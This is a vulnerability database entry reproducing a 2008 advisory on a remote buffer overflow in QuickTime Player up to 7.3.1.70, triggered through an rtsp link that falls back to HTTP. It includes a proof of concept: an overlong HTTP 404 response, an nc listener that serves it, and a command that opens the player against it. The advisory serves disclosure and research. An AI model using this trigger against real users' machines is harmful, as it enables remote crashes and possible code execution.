Quicktime Player <= 7.3.1.70 (rtsp) Buffer Overflow Vulnerability

2008-01-14T00:00:00

Description

No description provided by source.

{"href": "https://www.seebug.org/vuldb/ssvid-7851", "status": "poc", "bulletinFamily": "exploit", "modified": "2008-01-14T00:00:00", "title": "Quicktime Player <= 7.3.1.70 (rtsp) Buffer Overflow Vulnerability", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-7851", "cvelist": [], "description": "No description provided by source.", "viewCount": 2, "published": "2008-01-14T00:00:00", "sourceData": "\n #######################################################################\r\n\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0Luigi\u00a0Auriemma\r\n\r\nApplication:\u00a0\u00a0Quicktime\u00a0Player\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0http://www.apple.com/quicktime\r\nVersions:\u00a0\u00a0\u00a0\u00a0\u00a0<=\u00a07.3.1.70\r\nPlatforms:\u00a0\u00a0\u00a0\u00a0Windows\u00a0and\u00a0Mac\r\nBug:\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0buffer-overflow\r\nExploitation:\u00a0remote\r\nDate:\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a010\u00a0Jan\u00a02008\r\nThanx\u00a0to:\u00a0\u00a0\u00a0\u00a0\u00a0swirl\u00a0for\u00a0the\u00a0help\u00a0during\u00a0the\u00a0re-testing\u00a0of\u00a0the\u00a0bug\r\nAuthor:\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0Luigi\u00a0Auriemma\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0e-mail:\u00a0aluigi@autistici.org\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0web:\u00a0\u00a0\u00a0\u00a0aluigi.org\r\n\r\n\r\n#######################################################################\r\n\r\n\r\n1)\u00a0Introduction\r\n2)\u00a0Bug\r\n3)\u00a0The\u00a0Code\r\n4)\u00a0Fix\r\n\r\n\r\n#######################################################################\r\n\r\n===============\r\n1)\u00a0Introduction\r\n===============\r\n\r\n\r\nQuicktime\u00a0is\u00a0a\u00a0well\u00a0known\u00a0media\u00a0player\u00a0developed\u00a0by\u00a0Apple.\r\n\r\n\r\n#######################################################################\r\n\r\n======\r\n2)\u00a0Bug\r\n======\r\n\r\n\r\nThe\u00a0problem\u00a0is\u00a0a\u00a0buffer-overflow\u00a0which\u00a0happens\u00a0during\u00a0the\u00a0filling\u00a0of\r\nthe\u00a0LCD-like\u00a0screen\u00a0containing\u00a0info\u00a0about\u00a0the\u00a0status\u00a0of\u00a0the\u00a0connection.\r\n\r\nFor\u00a0exploiting\u00a0this\u00a0vulnerability\u00a0is\u00a0only\u00a0needed\u00a0that\u00a0an\u00a0user\u00a0follows\r\na\u00a0rtsp://\u00a0link,\u00a0if\u00a0the\u00a0port\u00a0554\u00a0of\u00a0the\u00a0server\u00a0is\u00a0closed\u00a0Quicktime\u00a0will\r\nautomatically\u00a0change\u00a0the\u00a0transport\u00a0and\u00a0will\u00a0try\u00a0the\u00a0HTTP\u00a0protocol\u00a0on\r\nport\u00a080,\u00a0the\u00a0404\u00a0error\u00a0message\u00a0of\u00a0the\u00a0server\u00a0(other\u00a0error\u00a0numbers\u00a0are\r\nvalid\u00a0too)\u00a0will\u00a0be\u00a0visualized\u00a0in\u00a0the\u00a0LCD-like\u00a0screen.\r\n\r\nDuring\u00a0my\u00a0tests\u00a0I\u00a0have\u00a0been\u00a0able\u00a0to\u00a0fully\u00a0overwrite\u00a0the\u00a0return\u00a0address\r\nanyway\u00a0note\u00a0that\u00a0the\u00a0visible\u00a0effects\u00a0of\u00a0the\u00a0vulnerability\u00a0could\u00a0change\r\nduring\u00a0the\u00a0usage\u00a0of\u00a0the\u00a0debugger\u00a0(in\u00a0attaching\u00a0mode\u00a0it's\u00a0everything\r\nok).\r\n\r\n\r\n#######################################################################\r\n\r\n===========\r\n3)\u00a0The\u00a0Code\r\n===========\r\n\r\n\r\nhttp://aluigi.org/poc/quicktimebof.txt\r\n\r\nquicktimebof.txt\r\nHTTP/1.1\u00a0404\u00a0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAxy\r\n\r\n\u00a0\u00a0nc\u00a0-l\u00a0-p\u00a080\u00a0-v\u00a0-v\u00a0-n\u00a0<\u00a0quicktimebof.txt\r\n\r\nand\u00a0then\r\n\r\n\u00a0\u00a0QuickTimePlayer.exe\u00a0rtsp://127.0.0.1/file.mp3\r\n\r\n\r\n#######################################################################\r\n\r\n======\r\n4)\u00a0Fix\r\n======\r\n\r\n\r\nNo\u00a0fix\r\n\r\n\r\n#######################################################################\n ", "id": "SSV:7851", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T21:50:05", "reporter": "Root", "enchantments": {"score": {"value": 0.6, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.6}, "references": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645335587}}

Quicktime Player &lt;= 7.3.1.70 (rtsp) Buffer Overflow Vulnerability

Description

Quicktime Player <= 7.3.1.70 (rtsp) Buffer Overflow Vulnerability